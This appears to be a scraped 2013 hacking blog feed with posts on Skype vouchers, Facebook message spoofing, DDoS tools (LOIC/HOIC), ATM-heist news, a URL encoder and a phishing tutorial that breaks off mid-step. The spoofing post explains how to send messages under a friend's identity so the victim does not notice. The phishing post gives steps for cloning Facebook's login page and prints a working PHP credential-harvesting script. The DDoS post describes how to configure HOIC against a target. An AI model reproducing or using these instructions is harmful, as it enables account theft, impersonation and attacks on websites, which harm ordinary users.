<li style="background-attachment: scroll; background-color: transparent; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlY9z8ISH_0UfMGXqATJ6zP3qOgxlBGGBkHoOzd35AevsfT1au1ptK8UKskmcVa22yxvcltux4m8vh6wFfZ-GF-gBUASdvgXHe54t3oPrYz5QUm7qaGwUsGzzxZeGbTDjxuA9k6pNowhc/s400/255.gif); background-position: 0px 4px; background-repeat: no-repeat no-repeat; margin: 0.3em 0px; padding: 0px 0px 0.8em 20px;"><a href="https://collaboration.skype.com/promotion/" style="-webkit-transition: color 0.2s; border: 0px; color: black; margin: 0px; outline: none; padding: 0px; text-decoration: none; transition: color 0.2s; vertical-align: baseline;">https://collaboration.skype.com/promotion/</a><br /><span style="background-color: transparent;">Then click on the link</span><span style="background-color: transparent;"> </span><span style="background-color: transparent;">below and</span><span style="background-color: transparent;"> </span><span style="background-color: transparent;">enter your skype name and password to sign in. after it will ask you to</span><span style="background-color: transparent;"> </span><span class="IL_AD" id="IL_AD5" style="background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(27, 142, 222) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(27, 142, 222) !important; cursor: pointer !important; display: inline !important; float: none !important; padding: 0px 0px 1px !important; position: static;">enter your code</span><span style="background-color: transparent;">, enter the code and click on Redeem. You are done with it. Enjoy Skype Free Premium Code of worth €71,88 for 12 months. </span></li>
<li style="background-attachment: scroll; background-color: transparent; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlY9z8ISH_0UfMGXqATJ6zP3qOgxlBGGBkHoOzd35AevsfT1au1ptK8UKskmcVa22yxvcltux4m8vh6wFfZ-GF-gBUASdvgXHe54t3oPrYz5QUm7qaGwUsGzzxZeGbTDjxuA9k6pNowhc/s400/255.gif); background-position: 0px 4px; background-repeat: no-repeat no-repeat; margin: 0.3em 0px; padding: 0px 0px 0.8em 20px;"><a href="https://secure.skype.com/portal/voucher/redeem" style="-webkit-transition: color 0.2s; background-color: transparent; border: 0px; color: black; margin: 0px; outline: none; padding: 0px; text-decoration: none; transition: color 0.2s; vertical-align: baseline;">https://secure.skype.com/portal/voucher/redeem</a><br />By Karteek Munjal</li>
</ul>
</div>
karteek munjalhttp://www.blogger.com/profile/11038471085469666615noreply@blogger.comtag:blogger.com,1999:blog-7579126592452208824.post-90557664153840624992013-08-16T10:10:00.003-07:002013-08-16T10:27:05.649-07:00Facebook Massege Spoofing<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"> i found one amazing Trick and thought to Share With You All Guys, Okay! but the problem is this trick works only sometimes. I mean it depends upon user security and some other contents. well It works everytime but unfortunately sometimes it goes into SPAM message - Just depend upon users security, networking, port etc. I'm gonna show you an tutorial on Facebook Message </span><span style="background-color: white; color: #333333; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12.727272033691406px; line-height: 15.454545021057129px; white-space: pre-wrap;">snoofing </span><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"> trick, and Send message to anyone from anyone's ID........</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://ist.mit.edu/sites/default/files/styles/news_image_headline/public/news_images/spoof_alert_740.jpg?itok=D4KRGpNL" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://ist.mit.edu/sites/default/files/styles/news_image_headline/public/news_images/spoof_alert_740.jpg?itok=D4KRGpNL" width="320" /></a></div>
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">Requirements</span><br />
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">Mail and Messge </span><b style="background-color: white; color: #00802a; font-family: arial, sans-serif; font-size: 14px; line-height: 16px; white-space: nowrap;">Spoofing </b><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">server</span><br />
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">Spoofed E-mail ID and Victim's Facebook Username</span><br />
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">How to do Facebook message </span><b style="background-color: white; color: #00802a; font-family: arial, sans-serif; font-size: 14px; line-height: 16px; white-space: nowrap;">Spoofing</b><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">?</span><br />
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">Ex.</span><br />
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"> </span><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">Ankit is an attacker, Rajat is victim and Kunal is </span><b style="background-color: white; color: #00802a; font-family: arial, sans-serif; font-size: 14px; line-height: 16px; white-space: nowrap;">Spoofed</b><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"> victim, the challenge in this is to send Message from kunal ID to </span><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">Rajat</span><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"> ID without logging into kunal's ID, and ankit will perform this attack as an attacker this is called </span><b style="background-color: white; color: #00802a; font-family: arial, sans-serif; font-size: 14px; line-height: 16px; white-space: nowrap;">Spoofing</b><span style="background-color: white; color: #333333; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12.727272033691406px; line-height: 15.454545021057129px; white-space: pre-wrap;"> </span><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">.</span><br />
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"> For Script Click Here </span><br />
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"> <a href="http://pastebin.com/pYGHAY5z" target="_blank">http://pastebin.com/pYGHAY5z</a></span><br />
Here Is The Script<br />
And Password :- <span style="background-color: white; color: blue; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px;">mahnamahna</span><br />
<span style="background-color: white; color: blue; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px;"><br /></span>
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">You'll get one form asking Target Email, Spoofed Email, etc.</span><br />
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">In the </span><b style="background-color: white; color: #00802a; font-family: arial, sans-serif; font-size: 14px; line-height: 16px; white-space: nowrap;">Spoofed</b><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"> E-mail type your spoofed email (I mean from whom's user ID you want to send message to your victim) For Eg. Rajat's E-mail is </span><a href="mailto:Rajat@gmail.com" style="background-color: white; color: #1155cc; font-family: arial, sans-serif; font-size: 13px;">Rajat@gmail.com</a><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">.</span><br />
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">In Target E-mail type Victim's Facebook Username for Eg. Our Victim is Kunal and his FB Username is </span><a href="mailto:kunal@facebook.com" style="background-color: white; color: #1155cc; font-family: arial, sans-serif; font-size: 13px;">kunal@facebook.com</a><br />
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">In reply E-mail you can fill up your E-mail ID of G-mail.</span><br />
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">And fill up your Message Title, and Type your message and Click on Submit.</span><br />
<br style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;" />
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">After all it will create a fake connection of </span><span style="background-color: white; color: #333333; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12.727272033691406px; line-height: 15.454545021057129px; white-space: pre-wrap;">snoofing </span><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"> and send fake message from Rajats's ID to Kunal's ID coz, Rajat is friend of Kunal, So it won't become Spam also and victim's won't realize also that he got Spoofed message.</span><br />
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"><br /></span>
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">victim will see this message in Chat Box, then he won't realized anything about Spoofed messaged.</span><br />
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXZOevrIhyNLhCyVVwpU_CNiPWcQAYIG-ThHPnq38U780cf4C-T_oEfP0jCQD93EFhCNLPHTrvsmP64BqMp-wWhzRDsIm14k9OmjEVphl0CBAu_tmWD-BZjZNkFNATtMjmmwKxcpsxvhs/s1600/photo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXZOevrIhyNLhCyVVwpU_CNiPWcQAYIG-ThHPnq38U780cf4C-T_oEfP0jCQD93EFhCNLPHTrvsmP64BqMp-wWhzRDsIm14k9OmjEVphl0CBAu_tmWD-BZjZNkFNATtMjmmwKxcpsxvhs/s320/photo.jpg" width="320" /></a></div>
<span style="color: #222222; font-family: arial, sans-serif; font-size: x-small;">Discovered By Karteek Munjal</span><br />
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">Hope U All Guys Will Enjoy Hacking</span><br />
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">Important note:- This Valun Is Already Reported To Fb They Will Never Look Into This Matter </span><br />
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-prn2/v/1082346_369529509816790_157665492_n.jpg?oh=63b6165d771d1e6c77242fd44ad53e19&oe=5210B1A3&__gda__=1376869967_e3e0d5304f9280d9b466408015e69acf" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-prn2/v/1082346_369529509816790_157665492_n.jpg?oh=63b6165d771d1e6c77242fd44ad53e19&oe=5210B1A3&__gda__=1376869967_e3e0d5304f9280d9b466408015e69acf" width="320" /></a></div>
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">Thx</span><br />
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">:D</span></div>
karteek munjalhttp://www.blogger.com/profile/11038471085469666615noreply@blogger.comtag:blogger.com,1999:blog-7579126592452208824.post-57001419725263404162013-06-01T01:44:00.004-07:002013-08-14T07:21:15.877-07:00Best DDos Too's of 2013 <div dir="ltr" style="text-align: left;" trbidi="on">
<h3 class="post-title entry-title" itemprop="name">
Best DDos Too's of 2013
</h3>
<div class="post-header">
</div>
<span style="font-size: large;"><b>Crash A WebSite :D </b></span><br />
<br />
<b><span style="font-size: medium;">1-Loic</span>:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrtUo_4tEOke6OVY-Fi9FRkbhfAqESxhi8-ST7lTF6YRmJNT_ia5vmV-Da0CaipcgRbgwB-1MavwVo-FQBF_dk3k0fr3AENjgbbvhxpek7WA05X_a0d-ljVBL2aSg_bi3-JD54wM3AR3g/s400/e0c60c36-03a4-11e0-ac81-a95336abb16e.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrtUo_4tEOke6OVY-Fi9FRkbhfAqESxhi8-ST7lTF6YRmJNT_ia5vmV-Da0CaipcgRbgwB-1MavwVo-FQBF_dk3k0fr3AENjgbbvhxpek7WA05X_a0d-ljVBL2aSg_bi3-JD54wM3AR3g/s320/e0c60c36-03a4-11e0-ac81-a95336abb16e.jpg" width="320" /></a></b></div>
<b><br /></b><span style="font-size: medium;"><b>2-Hoic:</b></span><br />
<br />
<h2 style="text-align: left;">
<span style="font-weight: normal;"><span style="font-size: xx-small;">A
new DDoS tool from Anonymous called high-orbit ion canon or HOIC come
into light. Attackers are constantly changing their tactics and tools in
response to defender's actions. HOIC is an Windows executable file.
Once started, you will be presented with the following GUI screen. If
the attacker clicks on the + sign under TARGETS they get another pop-up
box where you can specify target data.</span></span></h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0e2JUWrkSnmpVwrXtLHZaXCQWhsQW8wRtWifpfSXLPjdaryWBIe_PFZLwcc6VBpBbyw4AoHnj1J6eVPXdDW8zFdZtH22Ly8stuS33qOKlEeULa8_rBmRx1rdyq3AP6SiEawZwBG0LA28/s400/hoic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0e2JUWrkSnmpVwrXtLHZaXCQWhsQW8wRtWifpfSXLPjdaryWBIe_PFZLwcc6VBpBbyw4AoHnj1J6eVPXdDW8zFdZtH22Ly8stuS33qOKlEeULa8_rBmRx1rdyq3AP6SiEawZwBG0LA28/s320/hoic.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiySJmqr9QjsynsLJuz8VTq_0J6cG-Iw6omTQ8Xk-u2Spbj66-eAadVxgmDpkyrl44ODw5O0WavZhnSURFekrymEcRMPDdWOymdEuo69i2p8Enqv7ZX1rvz5hYyQZysxiYhPk4x2vyiZFU/s1600/6a0133f264aa62970b0167612e9611970b.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiySJmqr9QjsynsLJuz8VTq_0J6cG-Iw6omTQ8Xk-u2Spbj66-eAadVxgmDpkyrl44ODw5O0WavZhnSURFekrymEcRMPDdWOymdEuo69i2p8Enqv7ZX1rvz5hYyQZysxiYhPk4x2vyiZFU/s1600/6a0133f264aa62970b0167612e9611970b.png" /></a></div>
<h2 style="text-align: left;">
<span style="font-weight: normal;"><span style="font-size: xx-small;">When you click on the+ button, a new window will open where you can specify following things</span></span></h2>
<h2 style="text-align: left;">
<span style="font-weight: normal;"><span style="font-size: xx-small;"><b>URL</b> - is the target website to attack<br /><b>Power</b> -> sets the request velocity.<br /><b>Booster</b> - are config scripts that define the dynamic request attributes<br /><b>HOIC</b> includes a new feature called 'boosters' which are files you download or add to an attack<br />machine which enables the attacker to manipulate headers such as language, referrer, host, etc.<br />To launch the attack click on "<b><span style="color: #990000;">FIRE TEH LAZER!</span></b>" button. </span></span></h2>
<h2 style="text-align: left;">
<span style="font-weight: normal;"><span style="font-size: xx-small;">The
claim is this: LOIC did TCP, UDP and HTTP flooding, but HOIC focuses on
HTTP only. HOIC includes a new feature called 'boosters' which are files
you download or add to an attack machine which enables the attacker to
manipulate headers such as language, referrer, host, etc. This new
feature is designed to bypass signature based systems by using a lot of
different headers. Additionally, HOIC is supposedly faster.<br />But is it really an improvement? Overall, not really. There are several reasons:</span></span></h2>
<h2 style="text-align: left;">
<span style="font-size: xx-small;"><span style="font-weight: normal;">Problem 1: HOIC seems like a step backwards in terms of usability as it requires<br />client side installation and complex configuration files. LOIC offered the ability for<br />people with limited technical skills to perform DDoS--definitely not the case with HOIC.</span></span></h2>
<h2 style="text-align: left;">
<span style="font-size: xx-small;"><span style="font-weight: normal;">Problem 2: HOIC is indeed HTTP focused. However, HTTP flood is inherently slower<br />than UDP flood and simple TCP flood.</span></span></h2>
<h2 style="text-align: left;">
<span style="font-size: xx-small;"><span style="font-weight: normal;">Problem 3: Just writing in the tool's description "HOIC is faster" does not make it<br />faster and certainly does not explain why. As they say in the automobile industry: you<br />can't judge until the rubber hits the road. </span></span></h2>
<h2 style="text-align: left;">
<span style="font-size: xx-small;"><span style="font-weight: normal;">Problem 4: The "boosters" are nothing but configuration files that just allows broader<br />targeting. HOIC could allow you to diversity DDoS attack, but mostly for pretty<br />sophisticated users. But as we point out in bullet #2 above, are you really gaining<br />more in firepower?</span></span></h2>
<h2 style="text-align: left;">
<span style="font-weight: normal;"><b><span style="font-size: xx-small;">The high orbit ion cannon has the following features:</span></b></span></h2>
<h2 style="text-align: left;">
<span style="font-weight: normal;"><b><span style="font-size: xx-small;">- High-speed multi-threaded HTTP Flood<br />- Simultaenously flood up to 256 websites at once<br />- Built in scripting system to allow the deployment of 'boosters', scripts<br />designed to thwart DDoS counter measures and increase DoS output.<br />- Easy to use interface<br />- C an be ported over to Linux/Mac with a few bug fixes (I do not have<br />either systems so I do<br />- Ability to select the number of threads in an ongoing attack<br />- Ability to throttle attacks individually with three settings: LOW, MEDIUM,<br />and HIGH</span></b></span></h2>
<h2 style="text-align: left;">
<u><span style="font-size: xx-small;"><i>Soon You Can Download Them And Use Them :)</i></span></u><span style="font-weight: normal;"><span style="font-size: xx-small;"><b><br /></b></span></span></h2>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<b></b></div>
<div class="separator" style="clear: both; text-align: center;">
<b></b></div>
<div class="separator" style="clear: both; text-align: center;">
<b></b></div>
<div class="separator" style="clear: both; text-align: center;">
<u><b></b></u></div>
</div>
karteek munjalhttp://www.blogger.com/profile/11038471085469666615noreply@blogger.comtag:blogger.com,1999:blog-7579126592452208824.post-79647621285055933582013-05-12T07:28:00.000-07:002013-05-12T07:28:07.152-07:007 suspected Hackers who stole $2.4 million from ATM arrested <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1ZcfWe6DEUraoE1cVG3ZHu5PztQz2D-kZ4F5dxbCvwaZE87Mr_TxfJmn3cbQFy0ksWE4y2348S_WkxMZhkwOZ2Fv5KfJ-EY3ru9a9dGY7Kfa2BR1KhZY48I3sDh0-cRGxgvvpQCsnYfk/s200/cybercrime-hackers-stole-money.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1ZcfWe6DEUraoE1cVG3ZHu5PztQz2D-kZ4F5dxbCvwaZE87Mr_TxfJmn3cbQFy0ksWE4y2348S_WkxMZhkwOZ2Fv5KfJ-EY3ru9a9dGY7Kfa2BR1KhZY48I3sDh0-cRGxgvvpQCsnYfk/s200/cybercrime-hackers-stole-money.jpg" /></a></div>
<h3 class="entry-title">
7 suspected Hackers who stole $2.4 million from ATM arrested in NY</h3>
<h3 class="entry-title">
We are in the Cyber world , here the robbers don't wear masks, use guns
or even threatening bank tellers , they use laptop and internet instead.
<br />
<br />
An alleged international cyber criminals managed to steal $45 million from thousands of ATM's in matter of hours.<br />
<br />
Their first operation started from India, the hackers were able to
"infiltrate the system of an unnamed Indian credit-card processing
company that handles Visa and MasterCard prepaid debit cards. "<br />
<br />
In their first operation, the crews made 4,500 ATM transactions worldwide and stole $5million, according to <a href="http://www.nytimes.com/2013/05/10/nyregion/eight-charged-in-45-million-global-cyber-bank-thefts.html?_r=2&" rel="nofollow" target="_blank">New York Times report.</a> <br />
<br />
In the second operation, the crews made 36,000 transactions worldwide
and stole about $40 million in approximately 10 hours. It included $2.4
million stolen by a team of eight people in New York City. <br />
<br />
The seven of the eight suspected members of the New York crew have been
arrested. The eighth, said to be the ringleader, was found dead on
April 27 in the Dominican Republic. </h3>
<br /></div>
karteek munjalhttp://www.blogger.com/profile/11038471085469666615noreply@blogger.comtag:blogger.com,1999:blog-7579126592452208824.post-19932830682388809702013-05-10T23:57:00.000-07:002013-05-12T07:15:32.181-07:00Hackers withdraw millions in hit on world's ATMs<div dir="ltr" style="text-align: left;" trbidi="on">
<h1 class="cN-headingPage">
Hackers withdraw millions in hit on world's ATMs</h1>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0OhNWRGXLnE9pv_ZnaZYK11wZHbAxWAOe1-63XGMH2qKASTtudCrdi8QYYxc18eqVVQow7TWwF0lwN90fZYAvF0MIhAKtfECqEfxEufInw_k1_1jmWSuEYYneoSq5SWUUmSKEJ6zQUd0i/s1600/Senior+bank+manager%2527s+account+hacked.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0OhNWRGXLnE9pv_ZnaZYK11wZHbAxWAOe1-63XGMH2qKASTtudCrdi8QYYxc18eqVVQow7TWwF0lwN90fZYAvF0MIhAKtfECqEfxEufInw_k1_1jmWSuEYYneoSq5SWUUmSKEJ6zQUd0i/s320/Senior+bank+manager%2527s+account+hacked.jpg" width="320" /></a></div>
<h1 class="cN-headingPage">
</h1>
New York: It was a huge bank heist - but a 21st-century version in
which the robbers never wore ski masks, threatened a teller or set foot
in a vault.<br />
Yet, in two precision operations that involved operatives in
more than two dozen countries acting in close co-ordination and with
surgical precision, the organisation was able to steal $US45 million
from thousands of ATMs in a matter of hours.<br />
In New York City alone, a team of eight people struck 2904 machines over 10 hours on February 19, withdrawing $US2.4 million.<br />
On Thursday, federal prosecutors in Brooklyn unsealed an
indictment charging eight members of the New York crew - including their
suspected ringleader, who was found dead in the Dominican Republic on
April 27 - offering a glimpse into what the authorities said was one of
the most sophisticated and effective cybercrime attacks ever uncovered.<br />
''In the place of guns and masks, this cybercrime organisation used
laptops and the internet,'' said Loretta Lynch, the US attorney in
Brooklyn. ''Moving as swiftly as data over the internet, the
organisation worked its way from the computer systems of international
corporations to the streets of New York City, with the defendants
fanning out across Manhattan to steal millions of dollars from hundreds
of ATMs in a matter of hours.''<br />
The indictment outlined how they were able to steal data from
banks, relay that information to a far-flung network of ''cashing
crews'', then launder the stolen money by buying high-end luxury items
such as Rolex watches and expensive cars.<br />
In the first robbery, hackers were able to infiltrate the
system of an unnamed Indian credit-card processing company that handles
Visa and MasterCard prepaid debit cards.<br />
The hackers, who were not named in the indictment, proceeded
to raise the withdrawal limits on prepaid MasterCard debit accounts
issued by the National Bank of Ras Al-Khaimah, also known as Rakbank,
which is based in the United Arab Emirates.<br />
By eliminating the withdrawal limits, ''even a few
compromised bank account numbers can result in tremendous financial loss
to the victim financial institution'', the indictment said.<br />
With five account numbers in hand, the hackers distributed
the information to individuals in 20 countries who then encoded the
information on magnetic stripe cards.<br />
On December 21, the ''cashing crews'' made 4500 ATM
transactions worldwide, stealing $US5 million, according to the
indictment. But that robbery was just a prelude for what prosecutors
said was a more brazen crime two months later.<br />
On February 19, cashing crews stood at the ready at ATMs
across Manhattan and in two dozen other countries waiting for word to
spring into action.<br />
This time, the hackers infiltrated a credit card processing
company based in the US that also handles Visa and MasterCard prepaid
debit cards. The company's name was not revealed in the indictment.<br />
After securing 12 account numbers for cards issued by the
Bank of Muscat in Oman and raising the withdrawal limits, the cashing
crews were set in motion. Starting at 3pm, the crews made 36,000
withdrawls totalling about $US40 million from machines in the various
countries in about 10 hours.<br />
Surveillance photos of one suspect hitting various ATMs showed the man's backpack getting heavier and heavier, Ms Lynch said.<br />
The authorities said the leader of the New York cashing crew
was Alberto Lajud-Pena, 23, who also went by the name Prime. His body
was found in the Dominican Republic on April 27 and prosecutors said
they believed he was killed.<br />
Seven other people were charged with conspiracy to commit
''access device fraud'' and money laundering. The prosecutors said they
were all US citizens.<br />
<b><br /></b></div>
karteek munjalhttp://www.blogger.com/profile/11038471085469666615noreply@blogger.comtag:blogger.com,1999:blog-7579126592452208824.post-71614133028029814582013-04-17T05:53:00.002-07:002013-05-12T06:40:30.189-07:00Url Decoder/Encoder<div dir="ltr" style="text-align: left;" trbidi="on">
<center>
<head>
<title>URL Decoder/Encoder</title>
<style type="text/css">
<!--
body {background: white; color: black;}
form {margin: 0;}
h1 {font-family: Arial, sans-serif; line-height: 0.85em; border-bottom: 2px solid;
margin-bottom: 0.33em; padding-bottom: 0;}
textarea {background: #EEF;}
#footer {border-top: 1px solid #000; color: #999; font: italic 75% sans-serif;}
#footer p {margin: 0 0 1em 0;}
#footer img {float: right; margin: 0 0 0.5em 2em;}
</style></head>
</center>
<script type="text/javascript">
function encode() {
var obj = document.getElementById('dencoder');
var unencoded = obj.value;
obj.value = encodeURIComponent(unencoded);
}
function decode() {
var obj = document.getElementById('dencoder');
var encoded = obj.value;
obj.value = decodeURIComponent(encoded.replace(/\+/g, " "));
}
</script>
-->
<body>
<form onsubmit="return false;">
<h1>
URL Decoder/Encoder</h1>
<textarea cols="80" id="dencoder" rows="20"></textarea>
<div>
<input onclick="decode()" type="button" value="Decode" />
<input onclick="encode()" type="button" value="Encode" />
</div>
</form>
</body></div>
karteek munjalhttp://www.blogger.com/profile/11038471085469666615noreply@blogger.comtag:blogger.com,1999:blog-7579126592452208824.post-16132519741466762362013-04-11T05:55:00.000-07:002013-05-12T07:20:14.785-07:00INTRODUCTION TO PHISHING<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i1-news.softpedia-static.com/images/news2/Webmail-Phishing-Scam-Your-Email-Needs-to-Be-Reset-Immediately-2.jpg?1358755333" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i1-news.softpedia-static.com/images/news2/Webmail-Phishing-Scam-Your-Email-Needs-to-Be-Reset-Immediately-2.jpg?1358755333" width="320" /></a></div>
<h2 style="text-align: center;">
<b> </b></h2>
<h2 style="text-align: center;">
<b>INTRODUCTION TO PHISHING</b></h2>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
</div>
According to <a href="http://adf.ly/2966268/http://www.wikipedia.org/" target="_blank" title="Wikipedia Website">Wikipedia </a>->
Phishing is the act of attempting to acquire information such as
usernames, passwords, and credit card details (and sometimes,
indirectly, money) by masquerading as a trustworthy entity in an
electronic communication. Communications purporting to be from popular
social web sites, auction sites, online payment processors or IT
administrators are commonly used to lure the unsuspecting public.
Phishing emails may contain links to websites that are infected with
malware.</div>
<div style="text-align: justify;">
Phishing is typically carried out by
e-mail spoofing, instant messaging and it often directs users to enter
details at a fake website whose look and feel are almost identical to
the legitimate one. Phishing is an example of social engineering
techniques used to deceive users and exploits the poor usability of
current web security technologies. Attempts to deal with the growing
number of reported phishing incidents include legislation, user
training, public awareness, and technical security measures.</div>
<div style="text-align: justify;">
A phishing technique was described in
detail in 1987, and (according to its creator) the first recorded use of
the term “phishing” was made in 1995. The term is a variant of fishing,
probably influenced by phreaking, and alludes to “baits” used in hopes
that the potential victim will “bite” by clicking a malicious link or
opening a malicious attachment, in which case their financial
information and passwords may then be stolen.</div>
<div style="text-align: justify;">
So from above all information you are
get to know what is phishing exactly is. So lets now start with its
demonstration on one of your favorite website.</div>
<div style="text-align: center;">
———————————————————————————————————————————————————–</div>
<h2 style="text-align: center;">
<b>DEMONSTRATION</b></h2>
So now, lets start demonstration of phishing with one of your
favorite social networking website or emailing website. There are many
more, and this method will be apply to each and everyone like gmail.com,
yahoo.com,live.com, hotmail.com, facebook.com, twitter.com, flicr,
mail.com, rediffmail.com, in.com and rest of the websites which provide
these services.<br />
So I am gonna demonstrate you on <a href="http://adf.ly/2966268/http://www.facebook.com/" target="_blank" title="Facebook">facebook</a>.<br />
<b><span style="text-decoration: underline;">Step-1</span> :-</b>
Register to any free web hosting website. Some website give cpanel
hosting, which is better for phishing, but however there are huge
websites which provide free hosting, Some of them are -<br />
<a href="http://adf.ly/2966268/http://www.000webhost.com/order.php" target="_blank" title="000WebHost Free Web-Hosting Website">www.000webhost.com</a><br />
<a href="http://adf.ly/2966268/http://www.100gb.co/" target="_blank" title="100Gb.co">www.100gb.co</a><br />
<a href="http://adf.ly/2966268/http://www.x10hosting.com/" target="_blank" title="X10 Web Hosting">www.x10hosting.com</a><br />
Register with one of above free web hosting and confirm this hosting. once you done this, go to step-2.<br />
<b><span style="text-decoration: underline;">Step-2</span> :-</b> Now go <a href="http://adf.ly/2966268/http://www.facebook.com/" target="_blank" title="Facebook">www.facebook.com</a>
and press Ctrl+U or right click on web page and view source, now copy
this all source code and paste it into the new notepad file.<br />
<b><span style="text-decoration: underline;">Step-3</span> :-</b> Now save this notepad file with name index.html on your desktop or a folder where you want.<br />
<b><span style="text-decoration: underline;">Step-4</span> :-</b> Now open one more notepad file and copy the below whole code into it.<br />
<div style="text-align: center;">
———————————————————————————————————————————————————–</div>
<?php<br />
header (‘Location: http://www.facebook.com/ ‘);<br />
$handler = fopen(“log.txt”, “a”);<br />
foreach($_POST as $variable => $value) {<br />
fwrite($handler, $variable);<br />
fwrite($handler, “=”);<br />
fwrite($handler, $value);<br />
fwrite($handler, “\r\n”);<br />
}<br />
fwrite($handler, “\r\n”);<br />
fclose($handler);<br />
exit;<br />
?><br />
<div style="text-align: center;">
———————————————————————————————————————————————————–</div>
From <?php to ?>, copy content to new notepad file and save it
with any anyname.php, I am gonna save it with name login.php, you can
put anyname that you want but ensure that extension should be “.php”. In
the content there is a txt file (log.txt), you can put any name to txt
which is not guessable, I just pur log.txt but you should that name is
unguessable and its extension may b .txt or nothing.<br />
<div style="text-align: justify;">
<b><span style="text-decoration: underline;">Step-5</span> :-</b>
Now, again open index.html file into notepad (I would like to
